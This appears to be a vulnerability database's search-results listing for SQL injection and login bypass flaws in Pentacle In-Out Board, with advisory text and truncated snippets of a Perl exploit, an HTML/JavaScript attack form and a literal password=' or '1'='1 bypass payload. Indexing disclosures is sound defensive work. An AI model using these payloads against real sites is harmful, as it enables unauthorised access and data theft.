16 matches found
EUVD-2006-1004
Malware in sbrugna...
Pentacle In-Out Board <= 6.03 (newsdetailsview) Remote SQL Injection
No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: penta.pl victim directory Original Advisory: http://www.nukedx.com/?viewdoc=14 use IO::Socket; if@ARGV 3 print ++ +Pentacle In-Out...
Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass
No description provided by source. html titlePentacle In-Out Board = 6.03 login.asp Authencation ByPass Vulnerability/title script language=javascript function ptxpl ifdocument.xpl.victim.value== alertPlease enter site!; return false; ifconfirmAre you sure?...
CVE-2006-1000
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the 1 newsid parameter to newsdetailsview.asp and 2 password parameter to login.asp...
CVE-2006-1000
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the 1 newsid parameter to newsdetailsview.asp and 2 password parameter to login.asp...
CVE-2006-1000
Pentacle In-Out Board 3.0 and earlier contain multiple SQL injection vulnerabilities. The affected components are newsdetailsview.asp (parameter newsid) and login.asp (parameter password). The root cause is improper input handling, enabling remote attackers to execute arbitrary SQL commands and b...
PentacleBypass.txt
--Security Report-- Advisory: Pentacle In-Out Board http://site/ptdir/login.asp?username=any&password=' or '1'='1 -- Timeline: 25/02/2006: Vulnerability found. 25/02/2006: Contacted with vendor and waiting reply. -- Exploit: http://www.nukedx.com/?getxpl=13 -- Original advisory:...
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL Injection Vulnerability
--Security Report-- Advisory: Pentacle In-Out Board = 6.03 newsdetailsview.asp newsid Remote SQL Injection Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 25/02/06 06:08 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendo...
Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability
--Security Report-- Advisory: Pentacle In-Out Board = 6.03 login.asp Authencation ByPass Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 25/02/06 05:56 AM --- Contacts: ICQ: 10072 MSN/Email: nukedx at nukedx dot com Web: http://www.nukedx.com --- Vendor: G2SOFT...
Pentacle In-Out Board <= 6.03 (newsdetailsview) Remote SQL Injection
No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: penta.pl victim directory Original Advisory: http://www.nukedx.com/?viewdoc=14 use IO::Socket; if@ARGV 3 print " ++ +Pentacle In-O...
Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass
No description provided by source. html titlePentacle In-Out Board = 6.03 login.asp Authencation ByPass Vulnerability/title script language=javascript function ptxpl ifdocument.xpl.victim.value=="" alert"Please enter site!"; return false; ifconfirm"Are you sure?"...
Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass
Exploit for unknown platform in category web applications ============================================================ Pentacle In-Out Board Pentacle In-Out Board function ptxpl ifdocument.xpl.victim.value=="" alert"Please enter site!"; return false; ifconfirm"Are you sure?"...
Pentacle In-Out Board 6.03 - login.asp Remote Authentication Bypass
Pentacle In-Out Board 6.03 - login.asp Remote Authentication Bypass Pentacle In-Out Board function ptxpl ifdocument.xpl.victim.value=="" alert"Please enter site!"; return false; ifconfirm"Are you sure?" xpl.action="http://"+document.xpl.victim.value+"/login.asp";...
Pentacle In-Out Board 6.03 - newsdetailsview SQL Injection
Pentacle In-Out Board 6.03 - newsdetailsview SQL Injection !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: penta.pl Original Advisory: http://www.nukedx.com/?viewdoc=14 use IO::Socket; if@ARGV + + Example: penta.p...
Pentacle In-Out Board <= 6.03 (newsdetailsview) Remote SQL Injection
Exploit for unknown platform in category web applications ==================================================================== Pentacle In-Out Board use IO::Socket; if@ARGV + + Example: penta.pl sux.com / 1 + + Method found & Exploit scripted by nukedx + ++ "; exit; Local variables $pentaserver =...
Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass
Pentacle In-Out Board function ptxpl ifdocument.xpl.victim.value=="" alert"Please enter site!"; return false; ifconfirm"Are you sure?" xpl.action="http://"+document.xpl.victim.value+"/login.asp"; xpl.username.value=document.xpl.username.value; xpl.userpassword.value=document.xpl.userpassword.valu...